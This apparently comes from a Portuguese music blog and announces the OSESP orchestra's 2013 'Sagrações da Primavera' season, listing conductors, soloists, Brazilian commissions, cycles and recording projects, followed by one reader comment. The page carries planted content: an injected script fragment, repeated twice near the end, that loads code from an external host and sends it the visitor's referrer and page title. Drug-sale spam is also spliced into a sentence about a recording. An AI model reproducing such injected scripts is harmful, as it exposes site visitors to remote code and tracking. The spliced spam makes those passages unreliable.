LateralNotícia

Temporada OSESP 2013 – Sagrações da Primavera

A Temporada Osesp 2013, que começa no dia 28 de fevereiro, homenageia a Sagração da Primavera, obra-prima de Igor Stravinsky, que completa cem anos e serve de emblema para a renovação da ordem das coisas.

Serão 36 semanas de concertos de assinatura – 33 da Osesp, uma do Coro da Osesp e duas de orquestras convidadas – além das séries de câmara, corais e recitais, aos que se somam os concertos a preço popular, matinais gratuitos, itinerantes, ensaios abertos, apresentações ao ar livre –, e ainda, a turnê da Osesp pela Europa, em outubro. Os concertos da Osesp contam com a realização do Governo do Estado de São Paulo, por intermédio da Secretaria de Estado da Cultura.

As apresentações terão a participação de mais de 85 maestros e solistas convidados e, durante a Temporada, continuam os projetos de Artista em Residência, Compositor Visitante, Compositor Transversal, e as encomendas a compositores brasileiros. Marin Alsop, regente titular, estará com a Osesp em 11 semanas (e alguns dias), em um total de mais de 45 concertos, entre programas de assinatura, concertos ao ar livre, turnê europeia, gravações e dois concertos especiais pré-turnê, com o solista Nelson Freire.

Já os programas educativos da Fundação Osesp devem receber cerca de 120.000 crianças e adolescentes e 900 professores das redes pública e privada, além de seguir com as atividades da Academia Osesp, dos projetos de edição e publicação de partituras do Centro de Documentação Musical e da editora Criadores do Brasil, dos programas de difusão pela Rádio e TV Cultura, das entrevistas para o novo Acervo Osesp de História Oral, e dos encontros pelas séries Música na Cabeça e Falando de Música, sem falar nas edições da Revista Osesp.

Nas palavras do diretor artístico da Osesp, Arthur Nestrovski: “Ao falar de Sagrações da Primavera, bebemos do espírito de energia e renovação que não só define a obra-prima de Stravinsky, mas colore de conotações a palavra ‘primavera’ em si. Nossas sagrações acenam também para o significado histórico de resistência ao arbítrio e renovação da ordem das coisas associado a movimentos como a ‘Primavera de Praga’ (1968), e a ‘Primavera Árabe’ em curso, para ficar nesses dois exemplos. Mas o grande pano de fundo são mesmo as  histórias de reconstrução cultural no Brasil – a começar pela própria Osesp.”

Para o diretor executivo da Osesp, Marcelo Lopes: “Esta é mais uma temporada plena de novidades em que, ao celebrar a grande música, a Osesp segue cumprindo seu papel histórico de colocar o Brasil no circuito internacional de concertos. Esse binômio – Osesp mais Sala São Paulo –, assume um tom ainda mais relevante quando potencializado pelo poder criativo e inspirador de São Paulo, uma cidade que reconhece na cultura e nas artes a grandeza de seu destino. Na programação de 2013 se encontrarão artistas renomados e jovens talentosos, música de hoje e de grandes mestres do passado, todos os estilos. Esperamos que o público a desfrute com a mesma alegria que tivemos em prepará-la.”

E, para o Secretário de Estado da Cultura, Marcelo Mattos Araujo: “Como corpo estável mantido pelo Governo de São Paulo, a Osesp faz um trabalho educativo importantíssimo para a formação de plateias, buscando atrair cada vez mais um público novo e diversificado para as salas de concerto e teatros do Estado.”

SAGRAÇÃO 100 ANOS

Dentro do tema da Temporada 2013, os programas do ciclo Sagração 100 Anos incluem as estreias de Sacre du Sacre, de Marlos Nobre, e das Cinco Canções Sobre Poemas, de Vinicius de Moraes, de João Guilherme Ripper (homenageando também o centenário do poeta brasileiro); também, duas apresentações da Sagração da Primavera de Stravinsky – nas versões para dois pianos e para orquestra –; e ainda um programa especial, na semana do centenário, com obras compostas em 1813 (a Sétima de Beethoven), em 1913 (Paraísos Artificiais, do compositor impressionista português Freitas Branco), e em 2013 (a inédita de Ripper).

REGENTES

A Regente Titular Marin Alsop consolida seu trabalho à frente da Osesp fazendo oito semanas de assinatura, num total de 28 concertos (incluindo dois matinais gratuitos, dois no Festival de Campos do Jordão e um ao ar livre), além de reger a turnê europeia durante três semanas, com cerca de 15 concertos, e continuar as gravações das sinfonias de Prokofiev (selo Naxos). Em outubro, ela rege um programa especial, tendo Nelson Freire como solista de um concerto de Beethoven.

O Regente Associado Celso Antunes faz um programa com a compositora visitante Lera Auerbach, um com o Coro da Osesp (“Bach Imortal”), e duas estreias: o Sacre du Sacre para Orquestra, de Marlos Nobre, num programa com a participação da pianista Cristina Oritiz, e um com a Orquestra de Câmara, estreando o Concerto Para Viola e Orquestra do gaúcho Vagner Cunha. Grava ainda um CD dedicado à música de Almeida Prado.

O Regente Convidado de Honra Yan Pascal Tortelier apresenta vários programas relacionados aos ciclos especiais da Temporada – Britten 100, Brahms em Foco e Lutoslawski (Compositor Transversal) –, além de reger a Sinfonia dos Salmos, de Stravinsky, e o Stabat Mater, de Rossini.

Isaac Karabtchevsky continua o projeto de edição, apresentação e gravação das Sinfonias de Villa-Lobos, com o registro da Sinfonia nº 10 e apresentação da Sinfonia nº 12. Rege também a estreia do Concerto Para Violino e Orquestra de Francis Hime e a estreia de uma Fantasia Coral de André Mehmari, com o Coro da Osesp e a Sinfônica de Heliópolis, além das Quatro Peças Sacras de Verdi, no ano do bicentenário do autor.

A lista de outros regentes que estarão com a Osesp inclui Osmo Vänskä, Richard Armstrong, Heinz Holliger, Marcelo Lehninger, Stéphane Dénève, John Nelson, Alondra de La Parra, Giancarlo Guerrero, Frank Shipway, Mikhail Jurowski, Rafael Frühbeck de Burgos, Mei-Ann Chen, Lawrence Foster, David Atherton e Nathalie Stutzmann (Artista em Residência), Thomas Blunt (Coro da Osesp), Cláudio Cruz e Marcelo Fagerlande (Orquestra de Câmara da Osesp), e Fábio Mechetti, que rege a Filarmônica de Minas Gerais, orquestra convidada durante a turnê europeia da Osesp.

SOLISTAS EM DESTAQUE

– Pianistas: Jean-Yves Thibaudet, Hélène Grimaud, Nelson Freire, Paul Lewis, Cristina Ortiz, Nicholas Angelich, Simon Trpceski e Daniil Trifonov.

– Cordas: Thomas Zehetmair, Arabella Steinbacher, Pieter Wispelwey, Fábio Zanon, Daniel Müller-Schott, Cláudio Cruz e Horácio Schaefer.

– Cantores: Nathalie Stutzmann, Rachel Harnisch, Stephan Genz, os Swingle Singers, Rosana Lamosa, Carolina Faria, Luciano Botelho e Sávio Sperandio.

– Oboístas: Heinz Holliger e Washington Barella.

– Percussionista: Colin Currie.

ARTISTA EM RESIDÊNCIA

Em 2013, a artista em residência será a cantora e regente francesa Nathalie Stutzmann, que participa de vários programas de câmara e concertos com a Orquestra, além de uma masterclass. A contralto interpreta as Wesendonck Lieder de Wagner, comemorando o bicentenário de nascimento do autor; faz um recital com obras de Gounod e Debussy, entre outros; apresenta obras de Wagner, Schubert e Vivaldi com o Quarteto Osesp; e rege o Réquiem de Mozart, com a Orquestra e o Coro da Osesp.

COMPOSITORA VISITANTE

Este ano, a Osesp recebe a jovem compositora russa (radicada em Nova York) Lera Auerbach, nome de ponta da nova geração, autora de mais de 90 obras, da ópera à música de câmara, da sinfonia ao balé, além de exímia pianista. Ela participa de um encontro com o público na série Música na Cabeça, acompanha a estreia latino-americana de Post Silentium (co-encomenda da Osesp com a Staatskapelle Dresden), e toca três peças de sua autoria em um programa de câmara.

COMPOSITOR TRANSVERSAL

A cada ano, a Osesp apresenta, em várias formações, uma série significativa de obras de um determinado compositor ao longo da Temporada. Este ano é a vez de Witold Lutoslawski (1913-94) ser o compositor transversal da Orquestra. Um dos maiores nomes da música na segunda metade do século XX, foi figura central da “Renascença Polonesa”, com uma extensa e variada produção.

ENCOMENDAS DA OSESP

Sete obras de autores brasileiros estreiam em 2013:
– Edson Zampronha, Canto de Phoebus, para coro a cappella;
– Marlos Nobre, Sacre du Sacre, para orquestra. Homenagem à centenária obra-prima de Stravinsky;
– Vagner Cunha, Concerto Para Viola e Orquestra de Cordas;
– João Guilherme Ripper, Cinco Poemas de Vinicius de Moraes, para soprano e orquestra;
– Clarice Assad, Abertura;
– André Mehmari, Fantasia Coral (ainda sem título), para piano, coro e orquestra;
– Eduardo Guimarães Álvares, A Lua do Meio-Dia, peça para tímpano e percussão, em homenagem à timpanista Elizabeth Del Grande, que completa 40 anos de Osesp

Estreia de uma encomenda internacional

Lera Auerbach (Compositora Visitante), Post Silentium, para orquestra – uma co-encomenda com Staatskapelle Dresden.

CICLOS

Sagração 100 Anos: homenagem ao centenário da Sagração da Primavera, de Stravinsky;
Sinfonias de Sibelius: três obras dão início à integral das sete sinfonias do compositor finlandês, tocadas entre 2013 e 2015;
Três últimas Sinfonias de Mozart;
Centenário Britten: os três concertos de Benjamin Britten e um quarteto de cordas;
Brahms em Foco: obras sinfônicas, vocais e de câmara;
Wagner 200 e Verdi 200: homenagens ao bicentenário dos dois compositores, com apresentações de obras sinfônicas, vocais e de câmara.

MÚSICOS HOMENAGEADOS

A cada ano a Fundação Osesp homenageia um ou mais músicos, representando todos os demais. Eles participam de concertos especiais e gravações em sua homenagem, têm depoimentos registrados na Revista e no site da Osesp, além de CDs distribuídos aos assinantes e disponíveis para download gratuito. Em 2012, a percussionista Elizabeth Del Grande e o trompetista Gilberto Siqueira, que completam 40 anos na Orquestra, serão os homenageados. Gilberto será o solista, ao lado de Simon Trpceski, no Concerto nº 1 Para Piano de Shostakovich e Elizabeth estreará de uma peça de Eduardo Guimarães Álvares em sua homenagem, além de tocar a parte do tímpano na Sagração da Primavera.

PROJETOS DE GRAVAÇÃO

Dois grandes projetos de gravação continuam em andamento:

– Sinfonias de Prokofiev
Integral das sete sinfonias, acompanhadas de outras peças, regidas por Marin Alsop, para o selo Naxos. Com seis CDs previstos até 2016, o primeiro, trazendo a Sinfonia nº 5 e lançado em 2012, foi sucesso internacional de público e crítica. O próximo trará a Sinfonia nº 4. Em 2013, serão gravadas as Sinfonias nºs1 e 2.

– Sinfonias de Villa-Lobos
Integral das 11 sinfonias, sob a regência de Isaac Karabtchevsky, também responsável pela revisão musicológica das partitura, juntamente com o Centro de Documentação Musical, dirigido por Antonio Carlos Neves Pinto. O projeto prevê seis lançamentos pelo selo Naxos até 2016. O primeiro CD, lançado em 2012, trouxe as Sinfonias nºs 6 e 7. Em 2013, serão lançados os discos com as Sinfonias nºs 3 e 4.

A Osesp também gravará mais dois CDs: um CD inteiramente dedicado à música do compositor brasileiro Almeida Prado, regida por Celso Antunes e tendo Cláudio Cruz como solista da Fantasia Para Violino e Orquestra; e um CD (selo BIS), com Concertos purchase 200mg cytotec Para Violoncelo de Hindemith e Walter, com o solista Christian Poltéra, com regência de Frank Shipway.

CONCERTOS MATINAIS E CONCERTOS A PREÇOS POPULARES

Ao longo do ano, a Osesp apresentará vários concertos gratuitos nas manhãs de domingo (11h), e outros a preços populares, às 19h30, regidos por Marin Alsop, Celso Antunes, Isaac Karabtchevsky, Frank Shipway,  Yan Pascal Tortelier, Alondra de la Parra  e outros regentes convidados.

PARCERIA COM A PINACOTECA DO ESTADO

Dando continuidade à parceria entre a Osesp e a Pinacoteca do Estado de São Paulo, a capa do Livro da Temporada 2013 reproduz um quadro da artista Beatriz Milhazes, do Acervo da Pinacoteca. Outras sete obras de artistas brasileiros contemporâneos (Fayga Ostrower, Tomie Ohtake, Dudi Maia Rosa, Caetano de Almeida, Gonçalo Ivo, Renina Katz, Mira Schendel) estarão na capa de cada edição da Revista Osesp no próximo ano.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 Comment

  1. Este ano, perdi a oportunidade de comprar minha assinatura, mas a próxima
    gostaria de um alerta de sua parte para nao incorrer no mesmo erro.
    grato
    luiz

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.